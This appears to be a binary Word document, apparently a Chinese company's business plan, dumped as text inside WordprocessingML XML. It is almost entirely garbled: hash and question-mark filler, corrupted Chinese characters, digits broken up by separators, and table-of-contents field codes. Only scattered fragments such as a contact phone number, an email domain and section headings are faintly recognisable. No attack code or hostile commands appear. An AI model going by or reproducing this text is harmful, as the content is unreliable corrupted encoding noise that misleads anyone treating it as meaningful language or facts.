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?#?################&gt;###??</w:t>
        <w:tab/>
        <w:t>#############</w:t>
        <w:br/>
        <w:t>###*###########,#######????####%###&amp;###'###(###)###_###?###?###?###}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'`</w:t>
        <w:tab/>
        <w:t>###?R?###############0=####bjbj#?#?######################l7##r?##r?##?F######p###############R#######??##########??##########??##################?#####.#######.###.#######.#######v</w:t>
        <w:br/>
        <w:t>######v</w:t>
        <w:br/>
        <w:t>######v</w:t>
        <w:br/>
        <w:t>##T###########?</w:t>
        <w:br/>
        <w:t>######??######??######??##?###*?##t###??##,###?</w:t>
        <w:br/>
        <w:t>######z&gt;##?###??##H####?##(###F?######F?######F?######??##?###o?##?####?##?###u=######w=######w=######w=######w=######w=######w=##$###T@##h###?B##V###?=##?###################v</w:t>
        <w:br/>
        <w:t>######??######################??##Z###??######??######??######?=##############.#######.#######F?##############F?##??##4&gt;######=#######=#######=#######??##?###.###?###F?######v</w:t>
        <w:br/>
        <w:t>######F?######u=##############=#######################################################??######u=##############=#######=###?###u&amp;##D###?</w:t>
        <w:tab/>
        <w:t>##?###v</w:t>
        <w:br/>
        <w:t>##############################################################%)######F?####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t#X???#########??######??##?###?'##&amp;############,##d###J&gt;##0###z&gt;######?'##F####D######y</w:t>
        <w:br/>
        <w:t>##V####D##L###%)######################################################################%)##?####D##############v</w:t>
        <w:br/>
        <w:t>#######*######??######??######=#######??######??######################################??######??######??######?=######?=######################################?###n###################################??######??######??######z&gt;######??######??######??######??##############?</w:t>
        <w:br/>
        <w:t>######?</w:t>
        <w:br/>
        <w:t>######?</w:t>
        <w:br/>
        <w:t>##Dy###?##?o##?</w:t>
        <w:br/>
        <w:t>######?</w:t>
        <w:br/>
        <w:t>######?</w:t>
        <w:br/>
        <w:t>#######?######?</w:t>
        <w:br/>
        <w:t>######?</w:t>
        <w:br/>
        <w:t>######?</w:t>
        <w:br/>
        <w:t>######.#######.#######.#######.#######.#######.#######???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U ##N #?? ##R #fN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##??[?bzf???{?[</w:t>
        <w:tab/>
        <w:t>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??v</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>T?y##?[?bzf???{?[####y??vUSMO###??m3W#^?:N5uP[</w:t>
        <w:tab/>
        <w:t>gP?lQ?S</w:t>
        <w:tab/>
        <w:t>?####0W # # # #@W##?m3W?[?[?w?\?eQWENz??]#N?VA#2#-#7#F#####5u # # # #?##0#7#5#5#-#2#9#1#9#2#9#9#9##### O # # # ##w##0#7#5#5#8#6#2#2#7#9#2#9#####5uP[???N##g#o#f#a#r#@#1#8#9#.#c#n#####T? #?| #?N##UO?m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m3W#^?:N5uP[</w:t>
        <w:tab/>
        <w:t>gP?lQ?S</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#2#0#1#2#t^2##g6R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Xd #??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#lQ?S?W,g?`?Q#??m3W#^?:N5uP[</w:t>
        <w:tab/>
        <w:t>gP?lQ?S#02#0#0#1#t^1#1##g2#6#?e#b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QD?,g5#0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????#NUO?m1#0#0#%##0;N%?#N?RR??^?#?#0?e?~e??c#_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ǐ?S</w:t>
        <w:tab/>
        <w:t>Nt^?v#?.U6eeQ6#0#0#0#YO#N#0?k)R?m4#1#%##0?~)R?m7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0W?p#??m3W?w?\?eQWENz??]#N?VA#2#-#7#F##05u?0#7#5#5#-#2#9#1#9#2#9#9#9##0 O#w0#7#5#5#-#8#6#2#2#7#9#2#9##0T??|?N#?UO?m#0</w:t>
        <w:tab/>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#;N???{#t#??`?Q</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#UO?m#0;`?~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bM|?m3W#0?N'YE#M#B#A#?k#N#02#0#0#1#t^#R?R?m3W?:N5uP[</w:t>
        <w:tab/>
        <w:t>gP?lQ?SlQ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%?lQ?SASt^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?:N#\??#??TLr#b:N?V?QW?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>T?TLr#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#NgSf?\#0oR;`?~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bM|?m3W#02#0#0#7#t^???_?_l'Yf[???{:g#N#NUx?Xf[MO#02#0#0#9#t^?ReQ?m3W?:NlQ?S1\?N?b/g;`?v#N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,gy??v?v#x?S?S??N#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?N?T?c?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?[?bzf???{?[#S?b#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?[?b#a?^aS?#?#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#M#1#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#`penc?R</w:t>
        <w:br/>
        <w:t>N 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eT?#????bQ#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#/e#c#T?y#NaS#???#Y#0hQ)Y#P#??^@b</w:t>
        <w:tab/>
        <w:t>gR??^?[?b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zf???S5u#_sQ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t># # # #?V?Q??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?+R?b?S?T?e?#0?[?bO(u&gt;?#g?6q?e5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#T?l#_?aS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>N???S5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Q#R????#0?kt^?k??[?b???~5u??1#0#0#-#3#0#0#?^#0 # # # # # # # # # # # #dk??#YsS?csS(u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3# #?[?b?e?~e??c#_sQ # # # # # # ##?sS?csS(u</w:t>
        <w:tab/>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t># #?e??/fUS??/fWY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[?b?v?NUO#N*N?=??S?Ne??c#_sQ?N#a#N*Nop#b5u?zz#?#0???[?N?N?S?f?N'`#S</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>g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p_&gt;fR??^?vlx?N4l?Q#0?e?~#S/f'Y?R@b??_N?_6q?`?SR??^#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###4#?[?b?d&gt;ehV?N?Szf???{?[?s?#b</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t># # # #?R??#N#??d&gt;e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O?~?[?N(W#Oo`?e?d&gt;e?PN # #</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t># # #?R???N#?zf??#???zz#?)n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N?r#`sQ??b?z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#\*Y3??vRf&amp;^eg?v??#?#0?qaw?ezz#??R#???M?NO???n_c#?#0?N</w:t>
        <w:br/>
        <w:t>N?R??/f#?ǐ??#Y?vzf??$R?ev^??S?[?s?v#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#4#y??N?T-N2##03##04#y?^\?N?V?Q?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y?(W?V?Q^\?N??HQ?b/g#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#????#??#N?|#R?N?T??HQ/f:NR??^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t^??#w5u9??S?N#N?N?T.U?N?vS_#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?cGS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>g?R:#R??^?[?N#?ǐe??c#_sQ??Gd?c@b</w:t>
        <w:tab/>
        <w:t>g?c6R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wc??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[:N</w:t>
        <w:br/>
        <w:t>\#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?e?O?{#t#??Q#\</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>g?RXTpe??S?NZP0R?f}Y?v</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>g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R??^eg?/f#g'Y?v)R?v#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#8h?_?z?N?R#??N?T?r#R#0????#0?cGSR??^</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>g?R?T?{#t#0FU#N!j#_??HQ#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##xvz#N#_?S</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#,gy??v?v8h?_?b/g?[hQ1u,glQ?S?c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]?~3u???N</w:t>
        <w:tab/>
        <w:t>Ny??V?[#N)R#0?vMR?]?~?beQFU(u6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^\?N?V?Q?r#R#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#y??v?b/g</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>犖</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>^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x?S#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>O?b/g4ls^(WR#F#I#D#L?#N^\?N??HQ#08h?_?z?N?RSO?s(W?[R??^zf???N?T?vMR?w?b?c?|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b?b/g#_?S???R:_#0?vMR?b/g?eb?</w:t>
        <w:tab/>
        <w:t>g?N?d&gt;ehV?b/g:N#YOS#T\O#0?]?beQ?v#x?S?~9??~3#0#0##NCQ#0????3#t^?Q?beQ#x?S?~9?1#2#0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x?S?V#??s?N?v?o?R?e#_/f#?lQ?S?~)R?v5#%##R?~#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#L?#N?S#^:W</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#9hnc-N?V&gt;y#O?yf[b??e8n#xvz-N?_?S#^?v</w:t>
        <w:br/>
        <w:t>02#0#1#0#t^-N?V?e8n?SU\#R?g#N??Km#0#c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MR-N?V#f?~R??^?v?[?b;`pe:N2#0#0#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5## 7#t^?Q??#Y?X?0R5#0#0##N?#0^?#f?~R??^?[?b?#\$N</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>P?N#f?~R?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\?e#\??1#5#0#0##N?#0ncdkpenc??0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y??v?N?T?vMR?v#^:W?[?(W3#0#?NCQ?N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## 7#t^#T#\?X?R0R1#5#0#?NCQ?N</w:t>
        <w:br/>
        <w:t>N#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#%?#?V{eu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#ǒ(u#R?e?W%?#?!j#_#?#\teWY?N?T\O:Nnbc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[R??^6e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bc?QI{&lt;P?v?b9?#0#u?R??^?S?N)R(u???vzzn?seg?Nbc#b?N?v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OPN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>N:N#?iR#N?v?/f#b?N??^???bQ?/f#\D??n?Q.U?~???bQ#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#dkFU#N!j#_?v#O?p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</w:t>
        <w:tab/>
        <w:t>g?N?T?v?[?N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#\#?.U-N?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?^???N?S?[(W?v?N&lt;h#0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.U?e?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?^?eMQ9?O(u#N??.^?RvQ?^?z#N*N%?#? nS?#0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O??lQ?S#g'Y?v)R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N??s???Q#\&amp;^eg?v)R?m?X?R?Tnbc?b9??e?S?N?SR??^#gNO?b?N?v?bc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?_?N?T)R?m?_0R#g'Y#S?O??#0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?Oo`?R???S/f#b?N?v#N*N)Y6q?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O)R(u?vzz?yr+R'Y#N?e#?#b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(Wnbc?N&lt;P?V6e#T#u??S?N(u?N?T?~??MQ9??~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TMQ9??v?e#_?^?~</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>g?R#0(Wnbc?b9??e#b?N?S?NZP'Y?</w:t>
        <w:tab/>
        <w:t>g?v???bQ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s???bQ?v#N*N^??)R?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N/f#^:W</w:t>
        <w:br/>
        <w:t>NvQ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?@b?l</w:t>
        <w:tab/>
        <w:t>g?v#O?R#0#b?N?v?Oo`ǒ??T???[/f(W?N?T#?.UM?WY?L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#\?N'Y??N?Rir?R#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#7#.# #?N?T6R ? # # # #y??v?v?N?T?o??N?b/g#0?e?~#\???b/g#0???{:gQ?~?b/gI{:N#N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???v?]\O??-N(W#x?S6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MR@b</w:t>
        <w:tab/>
        <w:t>g?v?b/g?eHhGW?]#b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x?N?N/f?[?s?|?~?R???v}?SO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,gy??v-N?m?S0R?vlx?N??#Y6R ?Am#z?{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  <w:tab/>
        <w:t>gyr?k??#Y?T?]z???Bl#0,glQ?S</w:t>
        <w:tab/>
        <w:t>g?%??v#u?N?]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?N???R?[hQ?S?N?O??#^:W#?Bl#0?SPg?e?v?O?^_N^?8^E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  <w:tab/>
        <w:t>g?NUO??i#0(W(???c6R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</w:t>
        <w:tab/>
        <w:t>g#NteWY??~?v(???hKm?T?c6R?e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T?v#u?N#h?Q</w:t>
        <w:tab/>
        <w:t>cgq?V#h#u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?[hQ?O??lx?N??#Y?v(???T|Q?['`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.# #?{#t # # # # #,glQ?S(WR??^5uP[?Oo`L?#N?]?~</w:t>
        <w:tab/>
        <w:t>g1#0#t^?v?%??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#t?V#??x#T?]?~^?8^?Q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nx?z?N&amp;{#T?SU\??Bl?v?s?N#O#N?{#t6R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#fnx?v?l#t?~?g?T???~?~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R?^?[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bL?0R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hQ&amp;{#T?e?W#O#N?{#t??Bl#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#9#.# #??D??#f # # # #y??v??D?;`??:N5#0#0#0##NCQ?N#l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??(u?N?elQ?Sy{?^#0?N?T#x?S#u?N#0#^:W?c^#0e?EQAm?RD?ёI{?e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D?b_#_:N??Cg?b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D??e?L??bD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#\9hnc?S?e?beQOSFU#RM???Cg#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#"??R??Km</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#,gy??v#^:WMRof^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T)R?m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)R!j#_?{US#npf#0?V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??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ck8^?`?Q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geg</w:t>
        <w:tab/>
        <w:t>Nt^?vy??v)R?m#\HT?s#r?S'`?X????R#?h?1#</w:t>
        <w:tab/>
        <w:t>?#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t># # # # # # # # # # #t^?N</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#y??v##,{#Nt^##,{?Nt^##,{</w:t>
        <w:tab/>
        <w:t>Nt^##,{?Vt^##,{?Nt^####6eeQ##3#5#7#0#.#4###1#0#3#8#4###2#6#2#8#0###8#5#1#2#0###1#6#0#2#4#0#####/e?Q##2#6#3#9#.#1###5#3#3#2###1#2#4#0#8###4#0#1#7#0###7#4#5#8#0#####?k)R##2#9#3#0#.#4###8#0#4#4###1#9#8#0#0###5#9#2#0#0###1#1#1#6#4#0#####?Q)R?m##1#4#3#1#.#3###4#8#2#4###1#2#9#1#6#.#5###4#1#2#1#2#.#5###7#8#4#9#5#####?Q)R?s##4#0#.#0#9#%###4#6#.#4#6#%###4#9#.#1#5#%###4#8#.#4#2#%###4#8#.#9#9#%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0#.# #Θi??c6R # #,gy??v?v;N??Θi?</w:t>
        <w:tab/>
        <w:t>g#^:WΘi?#0?NMbΘi?#0"??RΘi??T?z?NΘi?#0vQ-N#^:WΘi?/f#c#^:W?[y??v?N?T?S?TN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v?l</w:t>
        <w:tab/>
        <w:t>g?[?s??#g?v#^:W?N???v#h#0?N?RD??nΘi?;N??/f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?#N#O#N?[,glQ?Sǖ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\vQ/f8h?_?NXTǒ(u???#0??CgI{Kb?k?L?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#b,glQ?S?N?RD??n'YE^?^Am1Y?vΘi?#?"??RΘi?;N??#c?V:N???{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>N?yf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y??v#T#g?Q?sD?ё</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>N???TOW&amp;??v?#0?z?NΘi?;N??/f#c?z?N?[Kb!j?N,gy??v?v?N?T?T?%?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eQ#^:W?z?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v # # # #U_</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>### #T#O#C# #\#o# #"#1#-#3#"# ###Xd??</w:t>
        <w:tab/>
        <w:t>### #P#A#G#E#R#E#F# #_#T#o#c#4#6#4#9#0#1#0#3#3# #\#h# #####2###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?v # # # #U_</w:t>
        <w:tab/>
        <w:t>### #P#A#G#E#R#E#F# #_#T#o#c#4#6#4#9#0#1#0#3#4# #\#h# #####3###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#,{#N?#R # #lQ?S?W,g?`?Q</w:t>
        <w:tab/>
        <w:t>### #P#A#G#E#R#E#F# #_#T#o#c#4#6#4#9#0#1#0#3#5# #\#h# #####4###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#,{?N?#R # #lQ?S?{#tB\</w:t>
        <w:tab/>
        <w:t>### #P#A#G#E#R#E#F# #_#T#o#c#4#6#4#9#0#1#0#3#6# #\#h# #####6###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#,{</w:t>
        <w:tab/>
        <w:t>N?#R # #?N?T/#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>g?R</w:t>
        <w:tab/>
        <w:t>### #P#A#G#E#R#E#F# #_#T#o#c#4#6#4#9#0#1#0#3#7# #\#h# #####9###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#,{?V?#R # ##xvz#N#_?S</w:t>
        <w:tab/>
        <w:t>### #P#A#G#E#R#E#F# #_#T#o#c#4#6#4#9#0#1#0#3#8# #\#h# #####1#2###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#,{?N?#R # #L?#N?S#^:W?`?Q</w:t>
        <w:tab/>
        <w:t>### #P#A#G#E#R#E#F# #_#T#o#c#4#6#4#9#0#1#0#3#9# #\#h# #####1#4###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#,{mQ?#R # #%?#?V{eu</w:t>
        <w:tab/>
        <w:t>### #P#A#G#E#R#E#F# #_#T#o#c#4#6#4#9#0#1#0#4#0# #\#h# #####1#6###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#,{#N?#R # #?N?T6R ?</w:t>
        <w:tab/>
        <w:t>### #P#A#G#E#R#E#F# #_#T#o#c#4#6#4#9#0#1#0#4#1# #\#h# #####1#8###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#,{kQ?#R # #?{#t</w:t>
        <w:tab/>
        <w:t>### #P#A#G#E#R#E#F# #_#T#o#c#4#6#4#9#0#1#0#4#2# #\#h# #####2#0###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
